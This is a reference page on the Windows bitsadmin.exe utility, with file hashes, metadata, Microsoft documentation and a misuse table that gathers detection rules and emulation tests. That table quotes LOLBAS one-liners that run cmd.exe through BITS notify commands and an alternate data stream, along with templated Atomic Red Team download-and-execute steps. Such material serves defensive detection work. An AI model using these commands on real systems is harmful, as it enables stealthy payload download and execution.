bitsadmin.exe

  • File Path: C:\windows\SysWOW64\bitsadmin.exe
  • Description: BITS administration utility

Hashes

Type Hash
MD5 9AC75D112F499D1466ADFD96738BF978
SHA1 86BB60A6AAE15C260A0D68D6C7802E1EDFD8E680
SHA256 E5892202DB9C37F741BA345D2BAAE658893E10F11FF67DD481DB6693FA3861D3
SHA384 57F9231B14154431C35040A0A89FF3064795D5B3EC589B28875CDC9564769C2F1F773DC42333C9F79E126A8C39090E7E
SHA512 A391A58A25C26908D49FCDE27B363C4FC7568B0AB9C76FA6FDF29BC36EBA4EFF2EE89F2FCB564A152C7F0D69AE2496F106E9470229ED03918921198B69BFD27D
SSDEEP 3072:a/+YmI3tJONozWyC/iVBVbGtFRVNkT0jPQHN8+VbpW/5xUITFc:zRaVB5G/AmQHNDlW/52

Signature

  • Status: The file C:\windows\SysWOW64\bitsadmin.exe is not digitally signed. You cannot run this script on the current system. For more information about running scripts and setting execution policy, see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170
  • Serial: ``
  • Thumbprint: ``
  • Issuer:
  • Subject:

File Metadata

  • Original Filename: bitsadmin.exe.mui
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 7.7.9600.16384 (winblue_rtm.130821-1623)
  • Product Version: 7.7.9600.16384
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.

Possible Misuse

The following table contains possible examples of bitsadmin.exe being misused. While bitsadmin.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma proxy_ua_bitsadmin_susp_tld.yml title: Bitsadmin to Uncommon TLD DRL 1.0
sigma proxy_ua_bitsadmin_susp_tld.yml description: Detects Bitsadmin connections to domains with uncommon TLDs - https://twitter.com/jhencinski/status/1102695118455349248 - https://isc.sans.edu/forums/diary/Investigating+Microsoft+BITS+Activity/23281/ DRL 1.0
sigma proxy_ua_bitsadmin_susp_tld.yml - Rare programs that use Bitsadmin and update from regional TLDs e.g. .uk or .ca DRL 1.0
sigma win_apt_greenbug_may20.yml - 'bitsadmin /transfer' DRL 1.0
sigma win_exploit_cve_2020_10189.yml - '*\bitsadmin.exe' DRL 1.0
sigma win_mmc_spawn_shell.yml - '*\BITSADMIN*' DRL 1.0
sigma win_mshta_spawn_shell.yml - '*\BITSADMIN*' DRL 1.0
sigma win_powershell_bitsjob.yml title: Suspicious Bitsadmin Job via PowerShell DRL 1.0
sigma win_process_creation_bitsadmin_download.yml title: Bitsadmin Download DRL 1.0
sigma win_process_creation_bitsadmin_download.yml description: Detects usage of bitsadmin downloading a file DRL 1.0
sigma win_process_creation_bitsadmin_download.yml - https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin DRL 1.0
sigma win_process_creation_bitsadmin_download.yml - '*\bitsadmin.exe' DRL 1.0
sigma win_process_creation_bitsadmin_download.yml - '*copy bitsadmin.exe*' DRL 1.0
sigma win_shell_spawn_susp_program.yml - '*\bitsadmin.exe' DRL 1.0
sigma win_susp_shell_spawn_from_mssql.yml - '*\bitsadmin.exe' DRL 1.0
sigma win_webshell_spawn.yml - '*\bitsadmin.exe' DRL 1.0
LOLBAS Bitsadmin.yml Name: Bitsadmin.exe  
LOLBAS Bitsadmin.yml - Command: bitsadmin /create 1 bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL bitsadmin /RESUME 1 bitsadmin /complete 1  
LOLBAS Bitsadmin.yml Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command from an Alternate data stream, then resume and complete the job.  
LOLBAS Bitsadmin.yml - Command: bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1  
LOLBAS Bitsadmin.yml Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.  
LOLBAS Bitsadmin.yml - Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin /reset  
LOLBAS Bitsadmin.yml - Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset  
LOLBAS Bitsadmin.yml Description: One-liner that creates a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.  
LOLBAS Bitsadmin.yml - Path: C:\Windows\System32\bitsadmin.exe  
LOLBAS Bitsadmin.yml - Path: C:\Windows\SysWOW64\bitsadmin.exe  
LOLBAS Bitsadmin.yml - IOC: Child process from bitsadmin.exe  
LOLBAS Bitsadmin.yml - IOC: bitsadmin creates new files  
LOLBAS Bitsadmin.yml - IOC: bitsadmin adds data to alternate data stream  
atomic-red-team index.md - Atomic Test #1: Bitsadmin Download (cmd) [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #2: Bitsadmin Download (PowerShell) [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #9: Windows - BITSAdmin BITS Download [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #1: Bitsadmin Download (cmd) [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #2: Bitsadmin Download (PowerShell) [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #9: Windows - BITSAdmin BITS Download [windows] MIT License. © 2018 Red Canary
atomic-red-team T1105.md - Atomic Test #9 - Windows - BITSAdmin BITS Download MIT License. © 2018 Red Canary
atomic-red-team T1105.md ## Atomic Test #9 - Windows - BITSAdmin BITS Download MIT License. © 2018 Red Canary
atomic-red-team T1105.md This test uses BITSAdmin.exe to schedule a BITS job for the download of a file. MIT License. © 2018 Red Canary
atomic-red-team T1105.md C:\Windows\System32\bitsadmin.exe /transfer #{bits_job_name} /Priority HIGH #{remote_file} #{local_path} MIT License. © 2018 Red Canary
atomic-red-team T1197.md The interface to create and manage BITS jobs is accessible through PowerShell (Citation: Microsoft BITS) and the BITSAdmin tool. (Citation: Microsoft BITSAdmin) MIT License. © 2018 Red Canary
atomic-red-team T1197.md - Atomic Test #1 - Bitsadmin Download (cmd) MIT License. © 2018 Red Canary
atomic-red-team T1197.md - Atomic Test #2 - Bitsadmin Download (PowerShell) MIT License. © 2018 Red Canary
atomic-red-team T1197.md ## Atomic Test #1 - Bitsadmin Download (cmd) MIT License. © 2018 Red Canary
atomic-red-team T1197.md This test simulates an adversary leveraging bitsadmin.exe to download MIT License. © 2018 Red Canary
atomic-red-team T1197.md bitsadmin.exe /transfer /Download /priority Foreground #{remote_file} #{local_file} MIT License. © 2018 Red Canary
atomic-red-team T1197.md ## Atomic Test #2 - Bitsadmin Download (PowerShell) MIT License. © 2018 Red Canary
atomic-red-team T1197.md This test simulates an adversary leveraging bitsadmin.exe to schedule a BITS transferand execute a payload in multiple steps. MIT License. © 2018 Red Canary
atomic-red-team T1197.md bitsadmin.exe /create #{bits_job_name} MIT License. © 2018 Red Canary
atomic-red-team T1197.md bitsadmin.exe /addfile #{bits_job_name} #{remote_file} #{local_file} MIT License. © 2018 Red Canary
atomic-red-team T1197.md bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} “” MIT License. © 2018 Red Canary
atomic-red-team T1197.md bitsadmin.exe /resume #{bits_job_name} MIT License. © 2018 Red Canary
atomic-red-team T1197.md bitsadmin.exe /complete #{bits_job_name} MIT License. © 2018 Red Canary
atomic-red-team T1560.001.md bitsadmin /transfer myDownloadJob /download /priority normal “https://www.win-rar.com/fileadmin/winrar-versions/winrar/th/winrar-x64-580.exe” #{rar_installer} MIT License. © 2018 Red Canary
atomic-red-team T1560.001.md bitsadmin /transfer myDownloadJob /download /priority normal “https://www.7-zip.org/a/7z2002-x64.exe” #{7zip_installer} MIT License. © 2018 Red Canary
signature-base apt_keyboys.yar $x1 = “egsvr32.exe "/u bitsadmin /canceft\windows\currebitsadmin” ascii CC BY-NC 4.0
signature-base gen_github_net_redteam_tools_guids.yara reference = “https://github.com/bitsadmin/nopowershell” CC BY-NC 4.0
signature-base gen_github_net_redteam_tools_guids.yara reference = “https://github.com/bitsadmin/fakelogonscreen” CC BY-NC 4.0
signature-base gen_recon_indicators.yar $s13 = “bitsadmin /rawreturn /transfer getfile” ascii CC BY-NC 4.0
signature-base thor-hacktools.yar reference = “https://github.com/bitsadmin/nopowershell” CC BY-NC 4.0

Additional Info*

*The information below is copied from MicrosoftDocs, which is maintained by Microsoft. Available under CC BY 4.0 license.


bitsadmin

Applies to: Windows Server (Semi-Annual Channel), Windows Server 2019, Windows Server 2016, Windows Server 2012 R2, Windows Server 2012, Windows 10

Bitsadmin is a command-line tool used to create, download or upload jobs, and to monitor their progress. The bitsadmin tool uses switches to identify the work to perform. You can call bitsadmin /? or bitsadmin /help to get a list of switches.

Most switches require a <job> parameter, which you set to the job’s display name, or GUID. A job’s display name doesn’t have to be unique. The /create and /list switches return a job’s GUID.

By default, you can access information about your own jobs. To access information for another user’s jobs, you must have administrator privileges. If the job was created in an elevated state, then you must run bitsadmin from an elevated window; otherwise, you’ll have read-only access to the job.

Many of the switches correspond to methods in the BITS interfaces. For additional details that may be relevant to using a switch, see the corresponding method.

Use the following switches to create a job, set and retrieve the properties of a job, and monitor the status of a job. For examples that show how to use some of these switches to perform tasks, see bitsadmin examples.

Available switches


MIT License. Copyright (c) 2020-2021 Strontic.